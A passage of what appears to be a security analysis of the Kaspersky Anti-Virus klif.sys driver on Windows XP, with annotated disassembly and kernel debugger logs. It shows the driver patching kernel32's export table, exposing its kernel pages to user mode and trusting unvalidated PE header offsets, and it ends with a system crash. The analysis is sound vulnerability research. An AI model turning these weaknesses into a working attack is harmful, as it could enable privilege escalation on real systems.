+.text:F8221910 push 0 +.text:F8221912 call KeGetCurrentThread +.text:F8221917 push eax +.text:F8221918 push esi +.text:F8221919 call KeInitializeApc +.text:F822191E push 0 +.text:F8221920 push 0 +.text:F8221922 push 0 +.text:F8221924 push esi +.text:F8221925 call KeInsertQueueApc +.text:F822192B test al, al +.text:F822192D jnz short loc_F822193D +.text:F822192F push esi ; P +.text:F8221930 call ds:ExFreePool +.text:F8221936 +.text:F8221936 loc_F8221936: ; CODE XREF: CheckInjectCodeForNewProcess+9j +.text:F8221936 ; CheckInjectCodeForNewProcess+20j ... +.text:F8221936 pop edi +.text:F8221937 xor al, al +.text:F8221939 pop esi +.text:F822193A retn 8 +.text:F822193D ; --------------------------------------------------------------------------- +.text:F822193D +.text:F822193D loc_F822193D: ; CODE XREF: CheckInjectCodeForNewProcess+7Dj +.text:F822193D pop edi +.text:F822193E mov al, 1 +.text:F8221940 pop esi +.text:F8221941 retn 8 + + +The APC routine itself patches kernel32's export table (and generates the +thunks to call kernel mode) and adjusts PTE attributes on KAV's driver image +to allow user mode access. + + +.text:F8221810 KavPatchNewProcessApcRoutine proc near ; DATA XREF: CheckInjectCodeForNewProcess+51o +.text:F8221810 +.text:F8221810 var_8 = dword ptr -8 +.text:F8221810 var_4 = dword ptr -4 +.text:F8221810 ImageBase = dword ptr 8 +.text:F8221810 +.text:F8221810 push ebp +.text:F8221811 mov ebp, esp +.text:F8221813 sub esp, 8 +.text:F8221816 mov eax, [ebp+ImageBase] +.text:F8221819 push esi +.text:F822181A push eax ; ImageBase +.text:F822181B call KavPatchImageForNewProcess +.text:F8221820 mov esi, dword_F8230518 +.text:F8221826 mov eax, dword_F823051C +.text:F822182B and esi, 0FFFFF000h +.text:F8221831 cmp esi, eax +.text:F8221833 mov [ebp+ImageBase], esi +.text:F8221836 jnb short loc_F8221883 +.text:F8221838 +.text:F8221838 loc_F8221838: ; CODE XREF: KavPatchNewProcessApcRoutine+71j +.text:F8221838 push esi +.text:F8221839 call KavPageTranslation0 +.text:F822183F push esi +.text:F8221840 mov [ebp+var_8], eax +.text:F8221843 call KavPageTranslation1 +.text:F8221849 mov [ebp+var_4], eax +.text:F822184C mov eax, [ebp+var_8] +.text:F822184F lock or dword ptr [eax], 4 +.text:F8221853 lock and dword ptr [eax], 0FFFFFEFFh +.text:F822185A mov eax, [ebp+var_4] +.text:F822185D invlpg byte ptr [eax] +.text:F8221860 lock or dword ptr [eax], 4 +.text:F8221864 lock and dword ptr [eax], 0FFFFFEFDh +.text:F822186B mov eax, [ebp+ImageBase] +.text:F822186E invlpg byte ptr [eax] +.text:F8221871 mov eax, dword_F823051C +.text:F8221876 add esi, 1000h +.text:F822187C cmp esi, eax +.text:F822187E mov [ebp+ImageBase], esi +.text:F8221881 jb short loc_F8221838 +.text:F8221883 +.text:F8221883 loc_F8221883: ; CODE XREF: KavPatchNewProcessApcRoutine+26j +.text:F8221883 pop esi +.text:F8221884 mov esp, ebp +.text:F8221886 pop ebp +.text:F8221887 retn 0Ch +.text:F8221887 KavPatchNewProcessApcRoutine endp + + +.text:F8221750 ; int __stdcall KavPatchImageForNewProcess(PUCHAR ImageBase) +.text:F8221750 KavPatchImageForNewProcess proc near ; CODE XREF: KavPatchNewProcessApcRoutine+Bp +.text:F8221750 +.text:F8221750 ImageBase = dword ptr 8 +.text:F8221750 +.text:F8221750 push ebx +.text:F8221751 call ds:KeEnterCriticalRegion +.text:F8221757 mov eax, dword_F82282F4 +.text:F822175C push 1 ; Wait +.text:F822175E push eax ; Resource +.text:F822175F call ds:ExAcquireResourceExclusiveLite +.text:F8221765 push 1 +.text:F8221767 call KavSetPageAttributes1 +.text:F822176C mov ecx, [esp+ImageBase] +.text:F8221770 push ecx ; ImageBase +.text:F8221771 call KavPatchImage +.text:F8221776 push 0 +.text:F8221778 mov bl, al +.text:F822177A call KavSetPageAttributes1 +.text:F822177F mov ecx, dword_F82282F4 ; Resource +.text:F8221785 call ds:ExReleaseResourceLite +.text:F822178B call ds:KeLeaveCriticalRegion +.text:F8221791 mov al, bl +.text:F8221793 pop ebx +.text:F8221794 retn 4 +.text:F8221794 KavPatchImageForNewProcess endp + + +The actual image patching reprotects the export table of kernel32, changes the +export address table entries for the LoadLibrary* family of functions to point +to a thunk that is written into spare space within the kernel32 image, and +writes the actual thunk code out: + + +.text:F8221680 ; int __stdcall KavPatchImage(PUCHAR ImageBase) +.text:F8221680 KavPatchImage proc near ; CODE XREF: KavPatchImageForNewProcess+21p +.text:F8221680 +.text:F8221680 var_C = dword ptr -0Ch +.text:F8221680 FunctionVa = dword ptr -8 +.text:F8221680 var_4 = dword ptr -4 +.text:F8221680 ImageBase = dword ptr 4 +.text:F8221680 +.text:F8221680 mov eax, [esp+ImageBase] +.text:F8221684 sub esp, 0Ch +.text:F8221687 push ebp +.text:F8221688 push 3Ch +.text:F822168A push eax +.text:F822168B call KavReprotectExportTable +.text:F8221690 mov ebp, eax +.text:F8221692 test ebp, ebp +.text:F8221694 jnz short loc_F822169F +.text:F8221696 xor al, al +.text:F8221698 pop ebp +.text:F8221699 add esp, 0Ch +.text:F822169C retn 4 +.text:F822169F ; --------------------------------------------------------------------------- +.text:F822169F +.text:F822169F loc_F822169F: ; CODE XREF: KavPatchImage+14j +.text:F822169F push ebx +.text:F82216A0 push esi +.text:F82216A1 push edi +.text:F82216A2 xor ebx, ebx +.text:F82216A4 mov edi, ebp +.text:F82216A6 mov esi, offset ExportedFunctionsToCheckTable +.text:F82216AB +.text:F82216AB CheckNextFunctionInTable: ; CODE XREF: KavPatchImage+B4j +.text:F82216AB mov edx, [esi+0Ch] +.text:F82216AE mov eax, [esp+1Ch+ImageBase] +.text:F82216B2 lea ecx, [esp+1Ch+var_C] +.text:F82216B6 push ecx +.text:F82216B7 push edx +.text:F82216B8 push eax +.text:F82216B9 call LookupExportedFunction +.text:F82216BE test eax, eax +.text:F82216C0 mov [esp+1Ch+FunctionVa], eax +.text:F82216C4 jz short loc_F8221725 +.text:F82216C6 mov edx, [esp+1Ch+var_C] +.text:F82216CA lea ecx, [esp+1Ch+var_4] +.text:F82216CE push ecx +.text:F82216CF push 40h +.text:F82216D1 push 4 +.text:F82216D3 push edx +.text:F82216D4 call KavExecuteNtProtectVirtualMemoryInt2E +.text:F82216D9 test al, al +.text:F82216DB jz short loc_F8221725 +.text:F82216DD cmp dword ptr [esi], 0 +.text:F82216E0 jnz short loc_F82216EF +.text:F82216E2 mov eax, [esp+1Ch+FunctionVa] +.text:F82216E6 mov ecx, [esp+1Ch+var_C] +.text:F82216EA mov [esi], eax +.text:F82216EC mov [esi+8], ecx +.text:F82216EF +.text:F82216EF loc_F82216EF: ; CODE XREF: KavPatchImage+60j +.text:F82216EF mov eax, edi +.text:F82216F1 mov edx, 90909090h +.text:F82216F6 mov [eax], edx +.text:F82216F8 mov [eax+4], edx +.text:F82216FB mov [eax+8], edx +.text:F82216FE mov [eax+0Ch], dx +.text:F8221702 mov [eax+0Eh], dl +.text:F8221705 mov byte ptr [edi], 0E9h +.text:F8221708 mov ecx, [esi+4] +.text:F822170B mov edx, ebx +.text:F822170D sub ecx, ebx +.text:F822170F sub ecx, ebp +.text:F8221711 sub ecx, 5 +.text:F8221714 mov [edi+1], ecx +.text:F8221717 mov ecx, [esp+1Ch+ImageBase] +.text:F822171B mov eax, [esp+1Ch+var_C] +.text:F822171F sub edx, ecx +.text:F8221721 add edx, ebp +.text:F8221723 mov [eax], edx ; +.text:F8221723 ; Patching Export Table here +.text:F8221723 ; e.g. write to 7c802f58 +.text:F8221723 ; (kernel32 EAT entry for LoadLibraryA) +.text:F8221723 ; +.text:F8221723 ; 578 241 00001D77 LoadLibraryA = _LoadLibraryA@4 +.text:F8221723 ; 579 242 00001D4F LoadLibraryExA = _LoadLibraryExA@12 +.text:F8221723 ; 580 243 00001AF1 LoadLibraryExW = _LoadLibraryExW@12 +.text:F8221723 ; 581 244 0000ACD3 LoadLibraryW = _LoadLibraryW@4 +.text:F8221723 ; +.text:F8221723 ; KAV writes a new RVA pointing to its hook code here. +.text:F8221725 +.text:F8221725 loc_F8221725: ; CODE XREF: KavPatchImage+44j +.text:F8221725 ; KavPatchImage+5Bj +.text:F8221725 add esi, 10h +.text:F8221728 add ebx, 0Fh +.text:F822172B add edi, 0Fh +.text:F822172E cmp esi, offset byte_F82357E0 +.text:F8221734 jb CheckNextFunctionInTable +.text:F822173A pop edi +.text:F822173B pop esi +.text:F822173C pop ebx +.text:F822173D mov al, 1 +.text:F822173F pop ebp +.text:F8221740 add esp, 0Ch +.text:F8221743 retn 4 +.text:F8221743 KavPatchImage endp + + +KAV's export table reprotecting code assumes that the user mode PE header is +well-formed and does not contain offsets pointing to kernel mode addresses: + + +.text:F8221360 KavReprotectExportTable proc near ; CODE XREF: KavPatchImage+Bp +.text:F8221360 +.text:F8221360 var_10 = dword ptr -10h +.text:F8221360 var_C = dword ptr -0Ch +.text:F8221360 var_8 = dword ptr -8 +.text:F8221360 var_4 = dword ptr -4 +.text:F8221360 arg_0 = dword ptr 4 +.text:F8221360 arg_4 = dword ptr 8 +.text:F8221360 +.text:F8221360 mov eax, [esp+arg_0] +.text:F8221364 sub esp, 10h +.text:F8221367 cmp word ptr [eax], 'ZM' +.text:F822136C push ebx +.text:F822136D push ebp +.text:F822136E push esi +.text:F822136F push edi +.text:F8221370 jnz loc_F8221442 +.text:F8221376 mov esi, [eax+3Ch] +.text:F8221379 add esi, eax +.text:F822137B mov [esp+20h+var_C], esi +.text:F822137F cmp dword ptr [esi], 'EP' +.text:F8221385 jnz loc_F8221442 +.text:F822138B lea eax, [esp+20h+var_8] +.text:F822138F xor edx, edx +.text:F8221391 mov dx, [esi+14h] +.text:F8221395 push eax +.text:F8221396 xor eax, eax +.text:F8221398 push 40h +.text:F822139A mov ax, [esi+6] +.text:F822139E lea ecx, [eax+eax*4] +.text:F82213A1 lea eax, [edx+ecx*8+18h] +.text:F82213A5 push eax +.text:F82213A6 push esi +.text:F82213A7 call KavExecuteNtProtectVirtualMemoryInt2E ; NtProtectVirtualMemory +.text:F82213AC test al, al +.text:F82213AE jz loc_F8221442 +.text:F82213B4 mov ecx, [esi+8] +.text:F82213B7 mov [esp+20h+var_10], 0 +.text:F82213BF inc ecx +.text:F82213C0 mov [esi+8], ecx +.text:F82213C3 xor ecx, ecx +.text:F82213C5 mov cx, [esi+14h] +.text:F82213C9 cmp word ptr [esi+6], 0 +.text:F82213CE lea edi, [ecx+esi+18h] +.text:F82213D2 jbe short loc_F8221442 +.text:F82213D4 mov ebp, [esp+20h+arg_4] +.text:F82213D8 +.text:F82213D8 loc_F82213D8: ; CODE XREF: KavReprotectExportTable+E0j +.text:F82213D8 mov ebx, [edi+10h] +.text:F82213DB test ebx, 0FFFh +.text:F82213E1 jz short loc_F82213EA +.text:F82213E3 or ebx, 0FFFh +.text:F82213E9 inc ebx +.text:F82213EA +.text:F82213EA loc_F82213EA: ; CODE XREF: KavReprotectExportTable+81j +.text:F82213EA mov ecx, [edi+8] +.text:F82213ED mov edx, ebx +.text:F82213EF sub edx, ecx +.text:F82213F1 cmp edx, ebp +.text:F82213F3 jle short loc_F822142C +.text:F82213F5 mov esi, [edi+0Ch] +.text:F82213F8 mov ecx, [esp+20h+arg_0] +.text:F82213FC sub esi, ebp +.text:F82213FE push ebp +.text:F82213FF add esi, ebx +.text:F8221401 add esi, ecx +.text:F8221403 push esi +.text:F8221404 call KavFindSectionName +.text:F8221409 test al, al +.text:F822140B jz short loc_F8221428 +.text:F822140D cmp dword ptr [edi+1], 'TINI' +.text:F8221414 jz short loc_F8221428 +.text:F8221416 lea eax, [esp+20h+var_4] +.text:F822141A push eax +.text:F822141B push 40h +.text:F822141D push ebp +.text:F822141E push esi +.text:F822141F call KavExecuteNtProtectVirtualMemoryInt2E ; NtProtectVirtualMemory +.text:F8221424 test al, al +.text:F8221426 jnz short loc_F822144E +.text:F8221428 +.text:F8221428 loc_F8221428: ; CODE XREF: KavReprotectExportTable+ABj +.text:F8221428 ; KavReprotectExportTable+B4j +.text:F8221428 mov esi, [esp+20h+var_C] +.text:F822142C +.text:F822142C loc_F822142C: ; CODE XREF: KavReprotectExportTable+93j +.text:F822142C mov eax, [esp+20h+var_10] +.text:F8221430 xor ecx, ecx +.text:F8221432 mov cx, [esi+6] +.text:F8221436 add edi, 28h +.text:F8221439 inc eax +.text:F822143A cmp eax, ecx +.text:F822143C mov [esp+20h+var_10], eax +.text:F8221440 jb short loc_F82213D8 +.text:F8221442 +.text:F8221442 loc_F8221442: ; CODE XREF: KavReprotectExportTable+10j +.text:F8221442 ; KavReprotectExportTable+25j ... +.text:F8221442 pop edi +.text:F8221443 pop esi +.text:F8221444 pop ebp +.text:F8221445 xor eax, eax +.text:F8221447 pop ebx +.text:F8221448 add esp, 10h +.text:F822144B retn 8 +.text:F822144E ; --------------------------------------------------------------------------- +.text:F822144E +.text:F822144E loc_F822144E: ; CODE XREF: KavReprotectExportTable+C6j +.text:F822144E mov eax, [edi+8] +.text:F8221451 mov [edi+10h], ebx +.text:F8221454 add eax, ebp +.text:F8221456 mov [edi+8], eax +.text:F8221459 mov eax, esi +.text:F822145B pop edi +.text:F822145C pop esi +.text:F822145D pop ebp +.text:F822145E pop ebx +.text:F822145F add esp, 10h +.text:F8221462 retn 8 +.text:F8221462 KavReprotectExportTable endp + + +The mechanism by which KAV uses to reprotect user mode code is rather much of +a hack as well. KAV dynamically determines the system call ordinal of the +NtProtectVirtualMemory system service and uses its own int 2e thunk to call the +service. + + +.text:F8221320 KavExecuteNtProtectVirtualMemoryInt2E proc near +.text:F8221320 ; CODE XREF: KavReprotectExportTable+47p +.text:F8221320 ; KavReprotectExportTable+BFp ... +.text:F8221320 +.text:F8221320 arg_0 = dword ptr 4 +.text:F8221320 arg_4 = dword ptr 8 +.text:F8221320 arg_8 = dword ptr 0Ch +.text:F8221320 arg_C = dword ptr 10h +.text:F8221320 +.text:F8221320 mov eax, [esp+arg_0] +.text:F8221324 mov ecx, [esp+arg_C] +.text:F8221328 mov edx, [esp+arg_8] +.text:F822132C push ebx +.text:F822132D mov [esp+4+arg_0], eax +.text:F8221331 push ecx +.text:F8221332 lea eax, [esp+8+arg_4] +.text:F8221336 push edx +.text:F8221337 mov edx, NtProtectVirtualMemoryOrdinal +.text:F822133D lea ecx, [esp+0Ch+arg_0] +.text:F8221341 push eax +.text:F8221342 push ecx +.text:F8221343 push 0FFFFFFFFh +.text:F8221345 push edx +.text:F8221346 xor bl, bl +.text:F8221348 call KavInt2E +.text:F822134D test eax, eax +.text:F822134F mov al, 1 +.text:F8221351 jge short loc_F8221355 +.text:F8221353 mov al, bl +.text:F8221355 +.text:F8221355 loc_F8221355: ; CODE XREF: KavExecuteNtProtectVirtualMemoryInt2E+31j +.text:F8221355 pop ebx +.text:F8221356 retn 10h +.text:F8221356 KavExecuteNtProtectVirtualMemoryInt2E endp + + +.user:F8231090 KavInt2E proc near ; CODE XREF: KavExecuteNtProtectVirtualMemoryInt2E+28p +.user:F8231090 +.user:F8231090 arg_0 = dword ptr 8 +.user:F8231090 arg_4 = dword ptr 0Ch +.user:F8231090 +.user:F8231090 push ebp +.user:F8231091 mov ebp, esp +.user:F8231093 mov eax, [ebp+arg_0] +.user:F8231096 lea edx, [ebp+arg_4] +.user:F823109C int 2Eh +.user:F823109C +.user:F823109E pop ebp +.user:F823109F retn 18h +.user:F823109F KavInt2E endp +.user:F823109F + + +KAV's export lookup code does not correctly validate offsets garnered from the +PE header before using them: + + +.text:F8220CA0 LookupExportedFunction proc near ; CODE XREF: sub_F8217A60+C9p +.text:F8220CA0 ; sub_F82181D0+Dp ... +.text:F8220CA0 +.text:F8220CA0 var_20 = dword ptr -20h +.text:F8220CA0 var_1C = dword ptr -1Ch +.text:F8220CA0 var_18 = dword ptr -18h +.text:F8220CA0 var_14 = dword ptr -14h +.text:F8220CA0 var_10 = dword ptr -10h +.text:F8220CA0 var_C = dword ptr -0Ch +.text:F8220CA0 var_8 = dword ptr -8 +.text:F8220CA0 var_4 = dword ptr -4 +.text:F8220CA0 arg_0 = dword ptr 4 +.text:F8220CA0 arg_4 = dword ptr 8 +.text:F8220CA0 arg_8 = dword ptr 0Ch +.text:F8220CA0 +.text:F8220CA0 mov edx, [esp+arg_0] +.text:F8220CA4 sub esp, 20h +.text:F8220CA7 cmp word ptr [edx], 'ZM' +.text:F8220CAC push ebx +.text:F8220CAD push ebp +.text:F8220CAE push esi +.text:F8220CAF push edi +.text:F8220CB0 jnz loc_F8220DE1 +.text:F8220CB6 mov eax, [edx+3Ch] +.text:F8220CB9 add eax, edx +.text:F8220CBB cmp dword ptr [eax], 'EP' +.text:F8220CC1 jnz loc_F8220DE1 +.text:F8220CC7 mov eax, [eax+78h] +.text:F8220CCA mov edi, [esp+30h+arg_4] +.text:F8220CCE add eax, edx +.text:F8220CD0 mov [esp+30h+var_14], eax +.text:F8220CD4 mov esi, [eax+1Ch] +.text:F8220CD7 mov ebx, [eax+24h] +.text:F8220CDA mov ecx, [eax+20h] +.text:F8220CDD add esi, edx +.text:F8220CDF add ebx, edx +.text:F8220CE1 add ecx, edx +.text:F8220CE3 cmp edi, 1000h +.text:F8220CE9 mov [esp+30h+var_4], esi +.text:F8220CED mov [esp+30h+var_C], ebx +.text:F8220CF1 mov [esp+30h+var_18], ecx +.text:F8220CF5 jnb short loc_F8220D27 +.text:F8220CF7 mov ecx, [eax+10h] +.text:F8220CFA mov eax, edi +.text:F8220CFC sub eax, ecx +.text:F8220CFE mov eax, [esi+eax*4] +.text:F8220D01 add eax, edx +.text:F8220D03 mov edx, [esp+30h+arg_8] +.text:F8220D07 test edx, edx +.text:F8220D09 jz loc_F8220DE3 +.text:F8220D0F mov ebx, ecx +.text:F8220D11 shl ebx, 1Eh +.text:F8220D14 sub ebx, ecx +.text:F8220D16 add ebx, edi +.text:F8220D18 pop edi +.text:F8220D19 lea ecx, [esi+ebx*4] +.text:F8220D1C pop esi +.text:F8220D1D pop ebp +.text:F8220D1E mov [edx], ecx +.text:F8220D20 pop ebx +.text:F8220D21 add esp, 20h +.text:F8220D24 retn 0Ch +.text:F8220D27 ; --------------------------------------------------------------------------- +.text:F8220D27 +.text:F8220D27 loc_F8220D27: ; CODE XREF: LookupExportedFunction+55j +.text:F8220D27 mov edi, [eax+14h] +.text:F8220D2A mov [esp+30h+arg_0], 0 +.text:F8220D32 test edi, edi +.text:F8220D34 mov [esp+30h+var_8], edi +.text:F8220D38 jbe loc_F8220DE1 +.text:F8220D3E mov [esp+30h+var_1C], esi +.text:F8220D42 +.text:F8220D42 loc_F8220D42: ; CODE XREF: LookupExportedFunction+13Bj +.text:F8220D42 cmp dword ptr [esi], 0 +.text:F8220D45 jz short loc_F8220DC5 +.text:F8220D47 mov ecx, [eax+18h] +.text:F8220D4A xor ebp, ebp +.text:F8220D4C test ecx, ecx +.text:F8220D4E mov [esp+30h+var_10], ecx +.text:F8220D52 jbe short loc_F8220DC5 +.text:F8220D54 mov edi, [esp+30h+var_18] +.text:F8220D58 mov [esp+30h+var_20], ebx +.text:F8220D5C +.text:F8220D5C loc_F8220D5C: ; CODE XREF: LookupExportedFunction+11Bj +.text:F8220D5C mov ebx, [esp+30h+var_20] +.text:F8220D60 xor esi, esi +.text:F8220D62 mov si, [ebx] +.text:F8220D65 mov ebx, [esp+30h+arg_0] +.text:F8220D69 cmp esi, ebx +.text:F8220D6B jnz short loc_F8220DAA +.text:F8220D6D mov eax, [edi] +.text:F8220D6F mov esi, [esp+30h+arg_4] +.text:F8220D73 add eax, edx +.text:F8220D75 +.text:F8220D75 loc_F8220D75: ; CODE XREF: LookupExportedFunction+F3j +.text:F8220D75 mov bl, [eax] +.text:F8220D77 mov cl, bl +.text:F8220D79 cmp bl, [esi] +.text:F8220D7B jnz short loc_F8220D99 +.text:F8220D7D test cl, cl +.text:F8220D7F jz short loc_F8220D95 +.text:F8220D81 mov bl, [eax+1] +.text:F8220D84 mov cl, bl +.text:F8220D86 cmp bl, [esi+1] +.text:F8220D89 jnz short loc_F8220D99 +.text:F8220D8B add eax, 2 +.text:F8220D8E add esi, 2 +.text:F8220D91 test cl, cl +.text:F8220D93 jnz short loc_F8220D75 +.text:F8220D95 +.text:F8220D95 loc_F8220D95: ; CODE XREF: LookupExportedFunction+DFj +.text:F8220D95 xor eax, eax +.text:F8220D97 jmp short loc_F8220D9E +.text:F8220D99 ; --------------------------------------------------------------------------- +.text:F8220D99 +.text:F8220D99 loc_F8220D99: ; CODE XREF: LookupExportedFunction+DBj +.text:F8220D99 ; LookupExportedFunction+E9j +.text:F8220D99 sbb eax, eax +.text:F8220D9B sbb eax, 0FFFFFFFFh +.text:F8220D9E +.text:F8220D9E loc_F8220D9E: ; CODE XREF: LookupExportedFunction+F7j +.text:F8220D9E test eax, eax +.text:F8220DA0 jz short loc_F8220DED +.text:F8220DA2 mov eax, [esp+30h+var_14] +.text:F8220DA6 mov ecx, [esp+30h+var_10] +.text:F8220DAA +.text:F8220DAA loc_F8220DAA: ; CODE XREF: LookupExportedFunction+CBj +.text:F8220DAA mov esi, [esp+30h+var_20] +.text:F8220DAE inc ebp +.text:F8220DAF add esi, 2 +.text:F8220DB2 add edi, 4 +.text:F8220DB5 cmp ebp, ecx +.text:F8220DB7 mov [esp+30h+var_20], esi +.text:F8220DBB jb short loc_F8220D5C +.text:F8220DBD mov ebx, [esp+30h+var_C] +.text:F8220DC1 mov edi, [esp+30h+var_8] +.text:F8220DC5 +.text:F8220DC5 loc_F8220DC5: ; CODE XREF: LookupExportedFunction+A5j +.text:F8220DC5 ; LookupExportedFunction+B2j +.text:F8220DC5 mov ecx, [esp+30h+arg_0] +.text:F8220DC9 mov esi, [esp+30h+var_1C] +.text:F8220DCD inc ecx +.text:F8220DCE add esi, 4 +.text:F8220DD1 cmp ecx, edi +.text:F8220DD3 mov [esp+30h+arg_0], ecx +.text:F8220DD7 mov [esp+30h+var_1C], esi +.text:F8220DDB jb loc_F8220D42 +.text:F8220DE1 +.text:F8220DE1 loc_F8220DE1: ; CODE XREF: LookupExportedFunction+10j +.text:F8220DE1 ; LookupExportedFunction+21j ... +.text:F8220DE1 xor eax, eax +.text:F8220DE3 +.text:F8220DE3 loc_F8220DE3: ; CODE XREF: LookupExportedFunction+69j +.text:F8220DE3 ; LookupExportedFunction+162j +.text:F8220DE3 pop edi +.text:F8220DE4 pop esi +.text:F8220DE5 pop ebp +.text:F8220DE6 pop ebx +.text:F8220DE7 add esp, 20h +.text:F8220DEA retn 0Ch +.text:F8220DED ; --------------------------------------------------------------------------- +.text:F8220DED +.text:F8220DED loc_F8220DED: ; CODE XREF: LookupExportedFunction+100j +.text:F8220DED mov eax, [esp+30h+var_4] +.text:F8220DF1 mov ecx, [esp+30h+arg_0] +.text:F8220DF5 lea ecx, [eax+ecx*4] +.text:F8220DF8 mov eax, [ecx] +.text:F8220DFA add eax, edx +.text:F8220DFC mov edx, [esp+30h+arg_8] +.text:F8220E00 test edx, edx +.text:F8220E02 jz short loc_F8220DE3 +.text:F8220E04 pop edi +.text:F8220E05 pop esi +.text:F8220E06 pop ebp +.text:F8220E07 mov [edx], ecx +.text:F8220E09 pop ebx +.text:F8220E0A add esp, 20h +.text:F8220E0D retn 0Ch +.text:F8220E0D LookupExportedFunction endp + + +User mode calling KAV kernel code directly without a ring 0 transition: + + +kd> bp f824d820 +kd> g +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 83ec08 sub esp,0x8 +kd> kv +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0006f4ec 7432f69c 74320000 00000001 00000000 klif!sub_F8231820 +0006f50c 7c9011a7 74320000 00000001 00000000 0x7432f69c +0006f52c 7c91cbab 7432f659 74320000 00000001 ntdll!LdrpCallInitRoutine+0x14 +0006f634 7c916178 00000000 c0150008 00000000 ntdll!LdrpRunInitializeRoutines+0x344 (FPO: [Non-Fpo]) +0006f8e0 7c9162da 00000000 0007ced0 0006fbd4 ntdll!LdrpLoadDll+0x3e5 (FPO: [Non-Fpo]) +0006fb88 7c801bb9 0007ced0 0006fbd4 0006fbb4 ntdll!LdrLoadDll+0x230 (FPO: [Non-Fpo]) +0006fc20 f824d749 0106c0f0 0000000e 0107348c 0x7c801bb9 +0006fd14 7c918dfa 7c90d625 7c90eacf 00000000 klif!loc_F823173D+0xc +0006fe00 7c910551 000712e8 00000044 0006ff0c ntdll!_LdrpInitialize+0x246 (FPO: [Non-Fpo]) +0006fecc 00000000 00072368 00000000 00078c48 ntdll!RtlFreeHeap+0x1e9 (FPO: [Non-Fpo]) +kd> t +klif!sub_F8231820+0x3: +001b:f824d823 53 push ebx +kd> r +eax=0006f3cc ebx=00000000 ecx=00005734 edx=0006f3ea esi=7c882fd3 edi=7432f608 +eip=f824d823 esp=0006ef00 ebp=0006f4ec iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 +klif!sub_F8231820+0x3: +001b:f824d823 53 push ebx +kd> dg 1b + P Si Gr Pr Lo +Sel Base Limit Type l ze an es ng Flags +---- -------- -------- ---------- - -- -- -- -- -------- +001B 00000000 ffffffff Code RE 3 Bg Pg P Nl 00000cfa +kd> !pte eip + VA f824d823 +PDE at C0300F80 PTE at C03E0934 +contains 01010067 contains 06B78065 +pfn 1010 ---DA--UWEV pfn 6b78 ---DA--UREV + + +KAV crashing the system when stepping through its kernel mode code when called +from user mode (apparently not that reliable after all!): + + +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 83ec08 sub esp,0x8 +kd> u eip +klif!sub_F8231820: +f824d820 ebfe jmp klif!sub_F8231820 (f824d820) +f824d822 085355 or [ebx+0x55],dl +f824d825 56 push esi +f824d826 57 push edi +f824d827 33ed xor ebp,ebp +f824d829 6820d824f8 push 0xf824d820 +f824d82e 896c2418 mov [esp+0x18],ebp +f824d832 896c2414 mov [esp+0x14],ebp +kd> g +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 ebfe jmp klif!sub_F8231820 (f824d820) +kd> g +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 ebfe jmp klif!sub_F8231820 (f824d820) +kd> bd 0 +kd> g +Break instruction exception - code 80000003 (first chance) +******************************************************************************* +* * +* You are seeing this message because you pressed either * +* CTRL+C (if you run kd.exe) or, * +* CTRL+BREAK (if you run WinDBG), * +* on your debugger machine's keyboard. * +* * +* THIS IS NOT A BUG OR A SYSTEM CRASH * +* * +* If you did not intend to break into the debugger, press the "g" key, then * +* press the "Enter" key now. This message might immediately reappear. If it * +* does, press "g" and "Enter" again. * +* * +******************************************************************************* +nt!RtlpBreakWithStatusInstruction: +804e3592 cc int 3 +kd> gu + +*** Fatal System Error: 0x000000d1 + (0x00003592,0x0000001C,0x00000000,0x00003592) + +Break instruction exception - code 80000003 (first chance) +******************************************************************************* +* * +* You are seeing this message because you pressed either * +* CTRL+C (if you run kd.exe) or, * +* CTRL+BREAK (if you run WinDBG), * +* on your debugger machine's keyboard. * +* * +* THIS IS NOT A BUG OR A SYSTEM CRASH * +* * +* If you did not intend to break into the debugger, press the "g" key, then * +* press the "Enter" key now. This message might immediately reappear. If it * +* does, press "g" and "Enter" again. * +* * +******************************************************************************* +nt!RtlpBreakWithStatusInstruction: +804e3592 cc int 3 +kd> g +Break instruction exception - code 80000003 (first chance) + +A fatal system error has occurred. +Debugger entered on first try; Bugcheck callbacks have not been invoked. + +A fatal system error has occurred. + +Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE +Loading Kernel Symbols +................................................................................................................ +Loading User Symbols +................................ +Loading unloaded module list +............ +******************************************************************************* +* * +* Bugcheck Analysis * +* * +******************************************************************************* + +Use !analyze -v to get detailed debugging information. + +BugCheck D1, {3592, 1c, 0, 3592} + +*** ERROR: Module load completed but symbols could not be loaded for klif.sys +Probably caused by : hardware + +Followup: MachineOwner +--------- + *** Possible invalid call from 804e331f ( nt!KeUpdateSystemTime+0x160 ) + *** Expected target 804e358e ( nt!DbgBreakPointWithStatus+0x0 ) + +nt!RtlpBreakWithStatusInstruction: +804e3592 cc int 3 +kd> !analyze -v +******************************************************************************* +* * +* Bugcheck Analysis * +* * +******************************************************************************* + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: 00003592, memory referenced +Arg2: 0000001c, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: 00003592, address which referenced memory + +Debugging Details: +------------------ + + +READ_ADDRESS: 00003592 + +CURRENT_IRQL: 1c + +FAULTING_IP: ++3592 +00003592 ?? ??? + +PROCESS_NAME: winlogon.exe + +DEFAULT_BUCKET_ID: INTEL_CPU_MICROCODE_ZERO + +BUGCHECK_STR: 0xD1 + +LAST_CONTROL_TRANSFER: from 804e3324 to 00003592 + +FAILED_INSTRUCTION_ADDRESS: ++3592 +00003592 ?? ??? + +POSSIBLE_INVALID_CONTROL_TRANSFER: from 804e331f to 804e358e + +TRAP_FRAME: f7872ce0 -- (.trap fffffffff7872ce0) +ErrCode = 00000000 +eax=00000001 ebx=000275fc ecx=8055122c edx=000003f8 esi=00000005 edi=ddfff298 +eip=00003592 esp=f7872d54 ebp=f7872d64 iopl=0 nv up ei pl nz na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 +00003592 ?? ??? +Resetting default scope + +STACK_TEXT: +WARNING: Frame IP not in any known module. Following frames may be wrong. +f7872d50 804e3324 00000001 f7872d00 000000d1 0x3592 +f7872d50 